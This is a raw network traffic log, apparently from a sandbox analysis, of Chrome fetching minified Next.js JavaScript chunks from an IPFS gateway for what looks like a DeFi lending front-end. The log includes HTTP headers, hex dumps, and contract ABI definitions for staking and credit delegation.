                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC1369INData Raw: 75 6e 63 74 69 6f 6e 20 65 28 29 7b 76 61 72 20 74 2c 61 2c 69 2c 75 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 2e 77 72 61 70 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 3b 3b 29 73 77 69 74 63 68 28 65 2e 70 72 65 76 3d 65 2e 6e 65 78 74 29 7b 63 61 73 65 20 30 3a 72 65 74 75 72 6e 20 75 2e 6c 65 6e 67 74 68 3e 30 26 26 76 6f 69 64 20 30 21 3d 3d 75 5b 30 5d 3f 75 5b 30 5d 3a 7b 7d 2c 44 3d 4a 53 4f 4e 2e 70 61 72 73 65 28 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 5f 5f 4e 45 58 54 5f 44 41 54 41 5f 5f 22 29 2e 74 65 78 74 43 6f 6e 74 65 6e 74 29 2c 77 69 6e 64 6f 77 2e 5f 5f 4e 45 58 54 5f 44 41 54 41 5f 5f 3d 44 2c 24 3d 44 2e 64 65 66 61 75 6c 74 4c 6f 63 61 6c 65 2c 74 3d 44 2e 61 73 73 65 74
                                                                                                                                                                                                                                                  Data Ascii: unction e(){var t,a,i,u=arguments;return n.wrap((function(e){for(;;)switch(e.prev=e.next){case 0:return u.length>0&&void 0!==u[0]?u[0]:{},D=JSON.parse(document.getElementById("__NEXT_DATA__").textContent),window.__NEXT_DATA__=D,$=D.defaultLocale,t=D.asset
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC1369INData Raw: 73 2c 6c 3d 22 22 2e 63 6f 6e 63 61 74 28 44 61 74 65 2e 6e 6f 77 28 29 2c 22 2d 22 29 2e 63 6f 6e 63 61 74 28 4d 61 74 68 2e 66 6c 6f 6f 72 28 38 39 39 39 39 39 39 39 39 39 39 39 39 2a 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 29 2b 31 65 31 32 29 3b 73 26 26 73 2e 6c 65 6e 67 74 68 26 26 28 74 3d 73 5b 30 5d 2e 73 74 61 72 74 54 69 6d 65 29 3b 76 61 72 20 66 3d 7b 69 64 3a 72 7c 7c 6c 2c 6e 61 6d 65 3a 6e 2c 73 74 61 72 74 54 69 6d 65 3a 6f 7c 7c 74 2c 76 61 6c 75 65 3a 6e 75 6c 6c 3d 3d 61 3f 69 3a 61 2c 6c 61 62 65 6c 3a 22 6d 61 72 6b 22 3d 3d 3d 75 7c 7c 22 6d 65 61 73 75 72 65 22 3d 3d 3d 75 3f 22 63 75 73 74 6f 6d 22 3a 22 77 65 62 2d 76 69 74 61 6c 22 7d 3b 6e 75 6c 6c 3d 3d 3d 63 7c 7c 76 6f 69 64 20 30 3d 3d 3d 63 7c 7c 63 28 66 29 2c 6b 2e 74 72
                                                                                                                                                                                                                                                  Data Ascii: s,l="".concat(Date.now(),"-").concat(Math.floor(8999999999999*Math.random())+1e12);s&&s.length&&(t=s[0].startTime);var f={id:r||l,name:n,startTime:o||t,value:null==a?i:a,label:"mark"===u||"measure"===u?"custom":"web-vital"};null===c||void 0===c||c(f),k.tr
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC1369INData Raw: 6e 20 6e 2e 77 72 61 70 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 3b 3b 29 73 77 69 74 63 68 28 65 2e 70 72 65 76 3d 65 2e 6e 65 78 74 29 7b 63 61 73 65 20 30 3a 69 66 28 21 74 2e 65 72 72 29 7b 65 2e 6e 65 78 74 3d 34 3b 62 72 65 61 6b 7d 72 65 74 75 72 6e 20 65 2e 6e 65 78 74 3d 33 2c 5a 28 74 29 3b 63 61 73 65 20 33 3a 72 65 74 75 72 6e 20 65 2e 61 62 72 75 70 74 28 22 72 65 74 75 72 6e 22 29 3b 63 61 73 65 20 34 3a 72 65 74 75 72 6e 20 65 2e 70 72 65 76 3d 34 2c 65 2e 6e 65 78 74 3d 37 2c 63 65 28 74 29 3b 63 61 73 65 20 37 3a 65 2e 6e 65 78 74 3d 31 37 3b 62 72 65 61 6b 3b 63 61 73 65 20 39 3a 69 66 28 65 2e 70 72 65 76 3d 39 2c 65 2e 74 30 3d 65 2e 63 61 74 63 68 28 34 29 2c 21 28 72 3d 52 2e 67 65 74 50 72 6f 70 65 72 45 72 72 6f 72 28
                                                                                                                                                                                                                                                  Data Ascii: n n.wrap((function(e){for(;;)switch(e.prev=e.next){case 0:if(!t.err){e.next=4;break}return e.next=3,Z(t);case 3:return e.abrupt("return");case 4:return e.prev=4,e.next=7,ce(t);case 7:e.next=17;break;case 9:if(e.prev=9,e.t0=e.catch(4),!(r=R.getProperError(
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC1369INData Raw: 2d 68 79 64 72 61 74 69 6f 6e 22 2c 22 62 65 66 6f 72 65 52 65 6e 64 65 72 22 2c 22 61 66 74 65 72 48 79 64 72 61 74 65 22 29 2c 7a 26 26 70 65 72 66 6f 72 6d 61 6e 63 65 2e 67 65 74 45 6e 74 72 69 65 73 42 79 4e 61 6d 65 28 22 4e 65 78 74 2e 6a 73 2d 68 79 64 72 61 74 69 6f 6e 22 29 2e 66 6f 72 45 61 63 68 28 7a 29 2c 6e 65 28 29 29 7d 66 75 6e 63 74 69 6f 6e 20 72 65 28 29 7b 69 66 28 62 2e 53 54 29 7b 70 65 72 66 6f 72 6d 61 6e 63 65 2e 6d 61 72 6b 28 22 61 66 74 65 72 52 65 6e 64 65 72 22 29 3b 76 61 72 20 65 3d 70 65 72 66 6f 72 6d 61 6e 63 65 2e 67 65 74 45 6e 74 72 69 65 73 42 79 4e 61 6d 65 28 22 72 6f 75 74 65 43 68 61 6e 67 65 22 2c 22 6d 61 72 6b 22 29 3b 65 2e 6c 65 6e 67 74 68 26 26 28 70 65 72 66 6f 72 6d 61 6e 63 65 2e 6d 65 61 73 75 72 65
                                                                                                                                                                                                                                                  Data Ascii: -hydration","beforeRender","afterHydrate"),z&&performance.getEntriesByName("Next.js-hydration").forEach(z),ne())}function re(){if(b.ST){performance.mark("afterRender");var e=performance.getEntriesByName("routeChange","mark");e.length&&(performance.measure
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC1369INData Raw: 28 65 2c 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 7b 7d 2c 74 29 29 7d 76 61 72 20 69 65 2c 75 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 72 3d 54 28 7b 7d 2c 74 2c 7b 43 6f 6d 70 6f 6e 65 6e 74 3a 56 2c 65 72 72 3a 44 2e 65 72 72 2c 72 6f 75 74 65 72 3a 4e 7d 29 3b 72 65 74 75 72 6e 20 66 2e 64 65 66 61 75 6c 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 6f 65 2c 6e 75 6c 6c 2c 61 65 28 65 2c 72 29 29 7d 7d 3b 66 75 6e 63 74 69 6f 6e 20 63 65 28 65 29 7b 76 61 72 20 74 3d 65 2e 41 70 70 2c 72 3d 65 2e 43 6f 6d 70 6f 6e 65 6e 74 2c 6e 3d 65 2e 70 72 6f 70 73 2c 6f 3d 65 2e 65 72 72 2c 61 3d 65 2e 5f 5f 4e 5f 52 53 43 2c 69 3d 22 69 6e 69 74 69 61 6c 22 69 6e 20 65 3f 76 6f 69 64 20 30
                                                                                                                                                                                                                                                  Data Ascii: (e,Object.assign({},t))}var ie,ue=function(e){return function(t){var r=T({},t,{Component:V,err:D.err,router:N});return f.default.createElement(oe,null,ae(e,r))}};function ce(e){var t=e.App,r=e.Component,n=e.props,o=e.err,a=e.__N_RSC,i="initial"in e?void 0


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  51192.168.2.549773209.94.90.24431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:44 UTC745OUTGET /_next/static/chunks/pages/_app-c0d18763a38243f4.js HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                  Referer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:44 UTC1363INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:44 GMT
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 1864710
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafybeibilt22avmfjggtmjz3el2khnv5d4rpyvcrfuds623d2oibz4wleq"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/chunks/pages/_app-c0d18763a38243f4.js
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeigaj3cwdjktvw36akiq43niv2siihkxaslemvv33lw5mhruragm5a,bafybeiarzqpstoo26we45swmenr4cty2xldwzxkk3de3tw2jrdlwkngi2a,bafybeibilt22avmfjggtmjz3el2khnv5d4rpyvcrfuds623d2oibz4wleq
                                                                                                                                                                                                                                                  2024-09-28 04:11:44 UTC137INData Raw: 78 2d 69 70 66 73 2d 70 6f 70 3a 20 72 61 69 6e 62 6f 77 2d 64 63 31 33 2d 30 32 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 67 65 3a 20 39 38 37 34 37 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 32 33 35 62 30 36 63 34 36 31 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: x-ipfs-pop: rainbow-dc13-02CF-Cache-Status: HITAge: 98747Accept-Ranges: bytesServer: cloudflareCF-RAY: 8ca0e4235b06c461-EWR
                                                                                                                                                                                                                                                  2024-09-28 04:11:44 UTC1369INData Raw: 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 32 38 38 38 5d 2c 7b 32 30 38 34 36 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 64 28 74 2c 7b 57 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 73 7d 7d 29 3b 76 61 72 20 72 3d 6e 28 36 34 31 34 36 29 2c 61 3d 6e 28 38 31 39 38 29 3b 63 6f 6e 73 74 20 69 3d 5b 7b 69 6e 70 75 74 73 3a 5b 7b 69 6e 74 65 72 6e 61 6c 54 79 70 65 3a 22 61 64 64 72 65 73 73 22 2c 6e 61 6d 65 3a 22 73 74 6b 41 61 76 65 22 2c 74 79 70 65 3a 22 61 64 64 72 65 73 73 22 7d 2c 7b 69 6e 74 65 72 6e 61 6c 54 79 70 65 3a 22 61 64 64 72 65 73 73 22 2c 6e 61
                                                                                                                                                                                                                                                  Data Ascii: (self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[2888],{20846:function(e,t,n){"use strict";n.d(t,{W:function(){return s}});var r=n(64146),a=n(8198);const i=[{inputs:[{internalType:"address",name:"stkAave",type:"address"},{internalType:"address",na
                                                                                                                                                                                                                                                  2024-09-28 04:11:44 UTC1369INData Raw: 72 69 63 65 55 73 64 22 2c 74 79 70 65 3a 22 75 69 6e 74 32 35 36 22 7d 2c 7b 69 6e 74 65 72 6e 61 6c 54 79 70 65 3a 22 75 69 6e 74 32 35 36 22 2c 6e 61 6d 65 3a 22 73 74 61 6b 65 41 70 79 22 2c 74 79 70 65 3a 22 75 69 6e 74 32 35 36 22 7d 2c 7b 69 6e 74 65 72 6e 61 6c 54 79 70 65 3a 22 75 69 6e 74 31 32 38 22 2c 6e 61 6d 65 3a 22 64 69 73 74 72 69 62 75 74 69 6f 6e 50 65 72 53 65 63 6f 6e 64 22 2c 74 79 70 65 3a 22 75 69 6e 74 31 32 38 22 7d 2c 7b 69 6e 74 65 72 6e 61 6c 54 79 70 65 3a 22 62 6f 6f 6c 22 2c 6e 61 6d 65 3a 22 69 6e 50 6f 73 74 53 6c 61 73 68 69 6e 67 50 65 72 69 6f 64 22 2c 74 79 70 65 3a 22 62 6f 6f 6c 22 7d 2c 7b 69 6e 74 65 72 6e 61 6c 54 79 70 65 3a 22 75 69 6e 74 32 35 36 22 2c 6e 61 6d 65 3a 22 64 69 73 74 72 69 62 75 74 69 6f 6e 45
                                                                                                                                                                                                                                                  Data Ascii: riceUsd",type:"uint256"},{internalType:"uint256",name:"stakeApy",type:"uint256"},{internalType:"uint128",name:"distributionPerSecond",type:"uint128"},{internalType:"bool",name:"inPostSlashingPeriod",type:"bool"},{internalType:"uint256",name:"distributionE
                                                                                                                                                                                                                                                  2024-09-28 04:11:44 UTC1369INData Raw: 65 72 63 65 6e 74 61 67 65 22 2c 74 79 70 65 3a 22 75 69 6e 74 32 35 36 22 7d 5d 2c 69 6e 74 65 72 6e 61 6c 54 79 70 65 3a 22 73 74 72 75 63 74 20 49 53 74 61 6b 65 64 54 6f 6b 65 6e 44 61 74 61 50 72 6f 76 69 64 65 72 2e 53 74 61 6b 65 64 54 6f 6b 65 6e 44 61 74 61 5b 5d 22 2c 6e 61 6d 65 3a 22 22 2c 74 79 70 65 3a 22 74 75 70 6c 65 5b 5d 22 7d 2c 7b 69 6e 74 65 72 6e 61 6c 54 79 70 65 3a 22 75 69 6e 74 32 35 36 22 2c 6e 61 6d 65 3a 22 22 2c 74 79 70 65 3a 22 75 69 6e 74 32 35 36 22 7d 5d 2c 73 74 61 74 65 4d 75 74 61 62 69 6c 69 74 79 3a 22 76 69 65 77 22 2c 74 79 70 65 3a 22 66 75 6e 63 74 69 6f 6e 22 7d 2c 7b 69 6e 70 75 74 73 3a 5b 7b 69 6e 74 65 72 6e 61 6c 54 79 70 65 3a 22 61 64 64 72 65 73 73 22 2c 6e 61 6d 65 3a 22 73 74 61 6b 65 64 41 73 73 65
                                                                                                                                                                                                                                                  Data Ascii: ercentage",type:"uint256"}],internalType:"struct IStakedTokenDataProvider.StakedTokenData[]",name:"",type:"tuple[]"},{internalType:"uint256",name:"",type:"uint256"}],stateMutability:"view",type:"function"},{inputs:[{internalType:"address",name:"stakedAsse
                                                                                                                                                                                                                                                  2024-09-28 04:11:44 UTC1369INData Raw: 65 64 54 6f 6b 65 6e 52 65 64 65 65 6d 61 62 6c 65 41 6d 6f 75 6e 74 22 2c 74 79 70 65 3a 22 75 69 6e 74 32 35 36 22 7d 2c 7b 69 6e 74 65 72 6e 61 6c 54 79 70 65 3a 22 75 69 6e 74 32 35 36 22 2c 6e 61 6d 65 3a 22 75 6e 64 65 72 6c 79 69 6e 67 54 6f 6b 65 6e 55 73 65 72 42 61 6c 61 6e 63 65 22 2c 74 79 70 65 3a 22 75 69 6e 74 32 35 36 22 7d 2c 7b 69 6e 74 65 72 6e 61 6c 54 79 70 65 3a 22 75 69 6e 74 32 35 36 22 2c 6e 61 6d 65 3a 22 72 65 77 61 72 64 73 54 6f 43 6c 61 69 6d 22 2c 74 79 70 65 3a 22 75 69 6e 74 32 35 36 22 7d 2c 7b 69 6e 74 65 72 6e 61 6c 54 79 70 65 3a 22 75 69 6e 74 34 30 22 2c 6e 61 6d 65 3a 22 75 73 65 72 43 6f 6f 6c 64 6f 77 6e 54 69 6d 65 73 74 61 6d 70 22 2c 74 79 70 65 3a 22 75 69 6e 74 34 30 22 7d 2c 7b 69 6e 74 65 72 6e 61 6c 54 79
                                                                                                                                                                                                                                                  Data Ascii: edTokenRedeemableAmount",type:"uint256"},{internalType:"uint256",name:"underlyingTokenUserBalance",type:"uint256"},{internalType:"uint256",name:"rewardsToClaim",type:"uint256"},{internalType:"uint40",name:"userCooldownTimestamp",type:"uint40"},{internalTy
                                                                                                                                                                                                                                                  2024-09-28 04:11:44 UTC1369INData Raw: 2c 6e 61 6d 65 3a 22 6d 61 78 53 6c 61 73 68 61 62 6c 65 50 65 72 63 65 6e 74 61 67 65 22 2c 74 79 70 65 3a 22 75 69 6e 74 32 35 36 22 7d 5d 2c 69 6e 74 65 72 6e 61 6c 54 79 70 65 3a 22 73 74 72 75 63 74 20 49 53 74 61 6b 65 64 54 6f 6b 65 6e 44 61 74 61 50 72 6f 76 69 64 65 72 2e 53 74 61 6b 65 64 54 6f 6b 65 6e 44 61 74 61 5b 5d 22 2c 6e 61 6d 65 3a 22 22 2c 74 79 70 65 3a 22 74 75 70 6c 65 5b 5d 22 7d 2c 7b 63 6f 6d 70 6f 6e 65 6e 74 73 3a 5b 7b 69 6e 74 65 72 6e 61 6c 54 79 70 65 3a 22 75 69 6e 74 32 35 36 22 2c 6e 61 6d 65 3a 22 73 74 61 6b 65 64 54 6f 6b 65 6e 55 73 65 72 42 61 6c 61 6e 63 65 22 2c 74 79 70 65 3a 22 75 69 6e 74 32 35 36 22 7d 2c 7b 69 6e 74 65 72 6e 61 6c 54 79 70 65 3a 22 75 69 6e 74 32 35 36 22 2c 6e 61 6d 65 3a 22 73 74 61 6b 65
                                                                                                                                                                                                                                                  Data Ascii: ,name:"maxSlashablePercentage",type:"uint256"}],internalType:"struct IStakedTokenDataProvider.StakedTokenData[]",name:"",type:"tuple[]"},{components:[{internalType:"uint256",name:"stakedTokenUserBalance",type:"uint256"},{internalType:"uint256",name:"stake
                                                                                                                                                                                                                                                  2024-09-28 04:11:44 UTC1369INData Raw: 65 73 74 61 6d 70 3a 65 2e 75 73 65 72 43 6f 6f 6c 64 6f 77 6e 54 69 6d 65 73 74 61 6d 70 2c 75 73 65 72 49 6e 63 65 6e 74 69 76 65 73 54 6f 43 6c 61 69 6d 3a 65 2e 72 65 77 61 72 64 73 54 6f 43 6c 61 69 6d 2e 74 6f 53 74 72 69 6e 67 28 29 7d 29 29 29 2c 65 74 68 50 72 69 63 65 55 73 64 3a 61 2e 74 6f 53 74 72 69 6e 67 28 29 7d 7d 61 73 79 6e 63 20 67 65 74 53 74 61 6b 65 64 41 73 73 65 74 44 61 74 61 42 61 74 63 68 28 65 2c 74 29 7b 63 6f 6e 73 74 5b 6e 2c 72 5d 3d 61 77 61 69 74 20 74 68 69 73 2e 5f 63 6f 6e 74 72 61 63 74 2e 67 65 74 53 74 61 6b 65 64 41 73 73 65 74 44 61 74 61 42 61 74 63 68 28 65 2c 74 29 2c 61 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 6d 61 70 28 28 65 3d 3e 28 7b 69 6e 50 6f 73 74 53 6c 61 73 68 69 6e 67 50
                                                                                                                                                                                                                                                  Data Ascii: estamp:e.userCooldownTimestamp,userIncentivesToClaim:e.rewardsToClaim.toString()}))),ethPriceUsd:a.toString()}}async getStakedAssetDataBatch(e,t){const[n,r]=await this._contract.getStakedAssetDataBatch(e,t),a=function(e){return e.map((e=>({inPostSlashingP
                                                                                                                                                                                                                                                  2024-09-28 04:11:44 UTC1369INData Raw: 74 69 6f 6e 22 7d 2c 7b 69 6e 70 75 74 73 3a 5b 7b 69 6e 74 65 72 6e 61 6c 54 79 70 65 3a 22 61 64 64 72 65 73 73 22 2c 6e 61 6d 65 3a 22 66 72 6f 6d 55 73 65 72 22 2c 74 79 70 65 3a 22 61 64 64 72 65 73 73 22 7d 2c 7b 69 6e 74 65 72 6e 61 6c 54 79 70 65 3a 22 61 64 64 72 65 73 73 22 2c 6e 61 6d 65 3a 22 74 6f 55 73 65 72 22 2c 74 79 70 65 3a 22 61 64 64 72 65 73 73 22 7d 5d 2c 6e 61 6d 65 3a 22 62 6f 72 72 6f 77 41 6c 6c 6f 77 61 6e 63 65 22 2c 6f 75 74 70 75 74 73 3a 5b 7b 69 6e 74 65 72 6e 61 6c 54 79 70 65 3a 22 75 69 6e 74 32 35 36 22 2c 6e 61 6d 65 3a 22 22 2c 74 79 70 65 3a 22 75 69 6e 74 32 35 36 22 7d 5d 2c 73 74 61 74 65 4d 75 74 61 62 69 6c 69 74 79 3a 22 76 69 65 77 22 2c 74 79 70 65 3a 22 66 75 6e 63 74 69 6f 6e 22 7d 5d 3b 63 6c 61 73 73 20
                                                                                                                                                                                                                                                  Data Ascii: tion"},{inputs:[{internalType:"address",name:"fromUser",type:"address"},{internalType:"address",name:"toUser",type:"address"}],name:"borrowAllowance",outputs:[{internalType:"uint256",name:"",type:"uint256"}],stateMutability:"view",type:"function"}];class
                                                                                                                                                                                                                                                  2024-09-28 04:11:44 UTC1369INData Raw: 74 75 72 6e 20 75 2e 67 74 65 28 6c 29 7d 7d 28 30 2c 72 2e 5f 5f 64 65 63 6f 72 61 74 65 29 28 5b 75 2e 45 42 2c 28 30 2c 72 2e 5f 5f 70 61 72 61 6d 29 28 30 2c 28 30 2c 6c 2e 4f 68 29 28 22 75 73 65 72 22 29 29 2c 28 30 2c 72 2e 5f 5f 70 61 72 61 6d 29 28 30 2c 28 30 2c 6c 2e 4f 68 29 28 22 64 65 6c 65 67 61 74 65 65 22 29 29 2c 28 30 2c 72 2e 5f 5f 70 61 72 61 6d 29 28 30 2c 28 30 2c 6c 2e 4f 68 29 28 22 64 65 62 74 54 6f 6b 65 6e 41 64 64 72 65 73 73 22 29 29 2c 28 30 2c 72 2e 5f 5f 70 61 72 61 6d 29 28 30 2c 28 30 2c 6c 2e 4b 35 29 28 22 61 6d 6f 75 6e 74 22 29 29 2c 28 30 2c 72 2e 5f 5f 6d 65 74 61 64 61 74 61 29 28 22 64 65 73 69 67 6e 3a 74 79 70 65 22 2c 46 75 6e 63 74 69 6f 6e 29 2c 28 30 2c 72 2e 5f 5f 6d 65 74 61 64 61 74 61 29 28 22 64 65 73
                                                                                                                                                                                                                                                  Data Ascii: turn u.gte(l)}}(0,r.__decorate)([u.EB,(0,r.__param)(0,(0,l.Oh)("user")),(0,r.__param)(0,(0,l.Oh)("delegatee")),(0,r.__param)(0,(0,l.Oh)("debtTokenAddress")),(0,r.__param)(0,(0,l.K5)("amount")),(0,r.__metadata)("design:type",Function),(0,r.__metadata)("des
                                                                                                                                                                                                                                                  2024-09-28 04:11:44 UTC1369INData Raw: 65 22 2c 50 72 6f 6d 69 73 65 29 5d 2c 6d 2e 70 72 6f 74 6f 74 79 70 65 2c 22 69 73 44 65 6c 65 67 61 74 69 6f 6e 41 70 70 72 6f 76 65 64 22 2c 6e 75 6c 6c 29 7d 2c 36 36 32 31 35 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 64 28 74 2c 7b 5a 30 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 73 7d 2c 61 72 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 2e 61 7d 2c 6b 58 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 2e 6b 7d 7d 29 3b 76 61 72 20 72 3d 6e 28 35 36 33 37 31 29 2c 61 3d 6e 28 36 34 31 34 36 29 3b 63 6f 6e 73 74 20 69 3d 5b 7b 69 6e 70 75 74 73 3a 5b 7b 69 6e 74 65 72 6e 61 6c 54 79 70 65 3a 22 61 64 64 72 65 73 73 22 2c 6e 61 6d 65 3a 22 62 61 73 65 22 2c
                                                                                                                                                                                                                                                  Data Ascii: e",Promise)],m.prototype,"isDelegationApproved",null)},66215:function(e,t,n){"use strict";n.d(t,{Z0:function(){return s},ar:function(){return o.a},kX:function(){return o.k}});var r=n(56371),a=n(64146);const i=[{inputs:[{internalType:"address",name:"base",


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  52192.168.2.549775209.94.90.34431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:44 UTC504OUTGET /_next/static/chunks/8420.5efc2099f7e56f19.js HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:44 UTC1360INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:44 GMT
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 54806
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreifu52qghnckfzybtczmj4dbeqgm674vvkb63ifoowcjsmeuv6ckqq"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/chunks/8420.5efc2099f7e56f19.js
